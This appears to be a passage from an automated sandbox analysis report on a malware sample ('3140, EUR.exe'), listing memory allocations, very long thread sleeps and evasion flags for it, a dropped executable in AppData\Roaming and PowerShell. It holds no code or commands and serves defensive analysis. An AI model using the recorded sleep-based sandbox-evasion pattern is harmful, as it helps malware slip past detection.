Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 9C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: AC80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 30A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 3200000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Memory allocated: 5200000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598007 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597786 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597672 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597560 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597334 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597212 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597045 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596717 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596391 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596266 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596141 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595703 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595484 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595375 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595266 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595141 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 595016 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594865 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594180 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 594061 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593953 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593844 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593734 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593625 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 593502 Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599560
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599432
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598387
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598266
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597594
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595294
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 595058
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Thread delayed: delay time: 594062
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7468 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6589 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Window / User API: threadDelayed 7175 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Window / User API: threadDelayed 2655 Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Window / User API: threadDelayed 2161
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Window / User API: threadDelayed 7694
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 6912 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116 Thread sleep count: 7468 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300 Thread sleep count: 177 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6264 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -29514790517935264s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7448 Thread sleep count: 7175 > 30 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7448 Thread sleep count: 2655 > 30 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -598007s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597786s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597560s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597334s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597212s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -597045s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596717s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596391s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -596031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595812s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595375s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -595016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -594865s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -594484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -594180s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -594061s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593953s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593734s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444 Thread sleep time: -593502s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7316 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7740 Thread sleep count: 2161 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599560s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7740 Thread sleep count: 7694 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599432s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599174s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598718s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598387s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598266s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -598047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597594s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597375s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596172s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595953s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595844s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595294s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595174s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -595058s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594937s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594828s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594719s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594609s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594500s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594391s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594281s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594172s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736 Thread sleep time: -594062s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 598007 Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Thread delayed: delay time: 597906 Jump to behavior
